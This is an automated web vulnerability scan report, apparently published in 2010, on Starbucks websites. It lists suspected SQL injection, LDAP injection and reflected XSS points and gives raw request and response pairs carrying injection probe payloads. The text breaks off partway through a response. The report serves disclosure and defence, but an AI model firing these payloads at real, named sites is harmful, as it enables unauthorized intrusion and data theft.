Report generated by HOYT LLC at Tue Nov 16 13:25:22 CST 2010.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

1. SQL injection

1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

1.3. http://www.starbucksstore.com/aff/adredir.asp [SITESERVER cookie]

2. LDAP injection

2.1. http://www.starbucksstore.com/ [ASPSESSIONIDACABBACA cookie]

2.2. http://www.starbucksstore.com/aff/adredir.asp [ASPSESSIONIDACABBACA cookie]

2.3. http://www.starbucksstore.com/coffee-machines/ [ASPSESSIONIDCCDDADAA cookie]

3. Cross-site scripting (reflected)

3.1. http://www.starbucks.com/ [8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter]

3.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

3.3. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

3.4. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

3.5. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

3.6. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

3.7. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

3.8. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

3.9. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

3.12. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

3.13. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]

3.14. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]

3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]

3.17. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

3.18. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

3.19. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

3.20. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

3.21. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

3.22. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

3.23. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

3.24. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

3.25. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

3.26. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]

3.27. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

3.28. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

3.29. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

3.30. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

3.31. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

3.32. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]

3.33. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

3.34. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

3.35. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

3.36. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

3.37. http://www.starbucks.com/search [keywords parameter]

3.38. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

3.39. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

3.40. http://www.starbucksstore.com/ [CookingAd cookie]

3.41. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp [CookingAd cookie]

3.42. http://www.starbucksstore.com/StarbucksCard/default.asp [CookingAd cookie]

3.43. http://www.starbucksstore.com/Tours/ [CookingAd cookie]

3.44. http://www.starbucksstore.com/aff/adredir.asp [CookingAd cookie]

3.45. http://www.starbucksstore.com/coffee [CookingAd cookie]

3.46. http://www.starbucksstore.com/coffee-machines [CookingAd cookie]

3.47. http://www.starbucksstore.com/coffee-machines/ [CookingAd cookie]

3.48. http://www.starbucksstore.com/default.asp [CookingAd cookie]

3.49. http://www.starbucksstore.com/entertainment [CookingAd cookie]

3.50. http://www.starbucksstore.com/entertainment/ [CookingAd cookie]

3.51. http://www.starbucksstore.com/extras/newsletters.asp [CookingAd cookie]

3.52. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp [CookingAd cookie]

3.53. http://www.starbucksstore.com/guestassist/gareturns.asp [CookingAd cookie]

3.54. http://www.starbucksstore.com/guestassist/shcontus.asp [CookingAd cookie]

3.55. http://www.starbucksstore.com/mya/links.asp [CookingAd cookie]

3.56. http://www.starbucksstore.com/mya/track.asp [CookingAd cookie]

3.57. http://www.starbucksstore.com/products/include/SearchNav.asp [CookingAd cookie]

3.58. http://www.starbucksstore.com/products/shabotus.asp [CookingAd cookie]

3.59. http://www.starbucksstore.com/products/shourplg.asp [CookingAd cookie]

3.60. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

3.61. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

3.62. http://www.starbucksstore.com/products/shprodli.asp [CookingAd cookie]

3.63. http://www.starbucksstore.com/products/sitemap.asp [CookingAd cookie]

3.64. http://www.starbucksstore.com/products/terms.asp [CookingAd cookie]

3.65. http://www.starbucksstore.com/small-office-coffee [CookingAd cookie]

3.66. http://www.starbucksstore.com/starbucks-coffee-delivery [CookingAd cookie]

3.67. http://www.starbucksstore.com/starbucks-coffee-delivery/ [CookingAd cookie]

3.68. http://www.starbucksstore.com/starbucks-coffee-tours/ [CookingAd cookie]

3.69. http://www.starbucksstore.com/starbucks-gift-cards [CookingAd cookie]

3.70. http://www.starbucksstore.com/starbucks-gifts [CookingAd cookie]

3.71. http://www.starbucksstore.com/starbucks-gifts/ [CookingAd cookie]

3.72. http://www.starbucksstore.com/starbucks-reserve [CookingAd cookie]

3.73. http://www.starbucksstore.com/starbucks-seasonal [CookingAd cookie]

3.74. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp [CookingAd cookie]

3.75. http://www.starbucksstore.com/starbucks-via [CookingAd cookie]

3.76. http://www.starbucksstore.com/tea [CookingAd cookie]

4. Open redirection



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 62476475'%20or%201%3d1--%20 and 62476475'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:35 GMT
Connection: close
Content-Length: 52660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi" title="Aged Sulawesi Kalosi">
                   <img src="http://assets.starbucks.com/assets/aa98bb468e8e4d11bcf9c7c5c337e4fd.jpg" alt="Aged Sulawesi Kalosi Stamp Art" />
                   <br /><strong><span>Aged Sulawesi Kalosi</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry" title="Brazil Sul de Minas Peaberry">
                   <img src="http://assets.starbucks.com/assets/84a1915283354bf5af4293a62a6b3175.jpg" alt="Brazil Sul de Minas Peaberry Stamp Art" />
                   <br /><strong><span>Brazil Sul de Minas Peaberry</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/nicaragua-corcasan" title="Nicaragua Corcasan">
                   <img src="http://assets.starbucks.com/assets/a96b1ae27bf54ad18badf356775bc1d0.jpg" alt="Nicaragua Corcasan Stamp Art" />
                   <br /><strong><span>Nicaragua Corcasan</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara" title="El Salvador Montecarlos Estate Pacamara">
                   <img src="http://assets.starbucks.com/assets/6099ccd747624971ba8c782bb0f8fe45.jpg" alt="El Salvador Pacamara Montecarlos Estate Catalog Image" />
                   <br /><strong><span>El Salvador Montecarlos Estate Pacamara</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/galapagos
...[SNIP]...

Request 2

GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:38 GMT
Connection: close
Content-Length: 51704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/starbucks-reserve-coffee/nicaragua-corcasan" title="Nicaragua Corcasan">
                   <img src="http://assets.starbucks.com/assets/a96b1ae27bf54ad18badf356775bc1d0.jpg" alt="Nicaragua Corcasan Stamp Art" />
                   <br /><strong><span>Nicaragua Corcasan</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara" title="El Salvador Montecarlos Estate Pacamara">
                   <img src="http://assets.starbucks.com/assets/6099ccd747624971ba8c782bb0f8fe45.jpg" alt="El Salvador Pacamara Montecarlos Estate Catalog Image" />
                   <br /><strong><span>El Salvador Montecarlos Estate Pacamara</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/galapagos-san-cristobal" title="Gal..pagos San Crist..bal">
                   <img src="http://assets.starbucks.com/assets/4d25963349584f26a7d3f9ac787313e9.jpg" alt="Galapagos San Cristobal" />
                   <br /><strong><span>Gal..pagos San Crist..bal</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
       </ol>
   </div>


   <div class="section" id="posts">


<div id="blog-603" class="blog-entry">
<h2><a href="/blog/The-New-Starbucks-Reservee284a2-Coffees">The New Starbucks Reserve... Coffees</a></h2>
<ul class="heading">
<li class="byline">
           <p class="postdate">October 05, 2010</p>
<p>Posted by Jason S., coffee engagement manager</p>
</li>
<li class="comment-num"><a href="/blog/the-new-starbucks-reservee284a2-coffees#blog-comments"><span class="comment-count">0</span> Comments</a></li>
</ul>

...[SNIP]...

1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13312046'%20or%201%3d1--%20 and 13312046'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /coffee/via/instant-coffee?113312046'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:02 GMT
Connection: close
Content-Length: 53520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/via/instant-coffee/christmas-blend" title="Christmas Blend">
                           <img src="http://assets.starbucks.com/assets/e9a91915e04244bf99f8a97ed289c558.jpg" alt="Starbucks VIA.. Christmas Blend" />
                           <br /><strong><span>Christmas Blend</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/colombia" title="Colombia">
                           <img src="http://assets.starbucks.com/assets/b5deaf4ecf7d425e822f907973cb950f.png" alt="Starbucks VIA.. Colombia" />
                           <br /><strong><span>Colombia</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Medium</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/iced-coffee" title="Iced">
                           <img src="http://assets.starbucks.com/assets/c0b5db9b45aa40c8802e6ef8cab1a455.jpg" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Iced</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/italian-roast" title="Italian Roast">
                           <img src="http://assets.starbucks.com/assets/68df7c127cf54ae78b4c40245fe8d7e4.png" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Extra Bold</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast">
                           <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Dec
...[SNIP]...

Request 2

GET /coffee/via/instant-coffee?113312046'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:02 GMT
Connection: close
Content-Length: 53065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/via/instant-coffee/colombia" title="Colombia">
                           <img src="http://assets.starbucks.com/assets/b5deaf4ecf7d425e822f907973cb950f.png" alt="Starbucks VIA.. Colombia" />
                           <br /><strong><span>Colombia</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Medium</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/iced-coffee" title="Iced">
                           <img src="http://assets.starbucks.com/assets/c0b5db9b45aa40c8802e6ef8cab1a455.jpg" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Iced</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/italian-roast" title="Italian Roast">
                           <img src="http://assets.starbucks.com/assets/68df7c127cf54ae78b4c40245fe8d7e4.png" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Extra Bold</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast">
                           <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Decaf Italian Roast" />
                           <br /><strong><span>Decaf Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
               </ol>
       </div>
       

       <div class="section" id="posts">


<div id="blog-602" class="blog-entry">
<h2><a href="/blog/Perfect-your-Starbucks-VIA-Ready-Brew-Flavored-experience">Perfect Your Starbucks VI
...[SNIP]...

1.3. http://www.starbucksstore.com/aff/adredir.asp [SITESERVER cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The SITESERVER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SITESERVER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C'; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:25 GMT
Connection: close
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

Request 2

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C''; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 168
Content-Type: text/html
Location: /coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:26 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/coffee/?CCAID=SBPTPAHP1SHCO&amp;Redir=/coffee/">here</a>.</body>

2. LDAP injection  previous  next
There are 3 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://www.starbucksstore.com/ [ASPSESSIONIDACABBACA cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.

The payloads b04135e4d2d6b331)(sn=* and b04135e4d2d6b331)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:30 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="Find every Starbucks Coffee at the Official Online Store.">
   <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
   

   <script src="/include/LibJavaScript.js" type="text/javascript"></script>
<title>
Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store
</title>

</head>    
<body id="home">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(document.searchform.keywords,'keyword or item#');">
</td><td style="
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACABBACA=HOJMDLCBHPPELAMPENAAECCJ; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:30 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
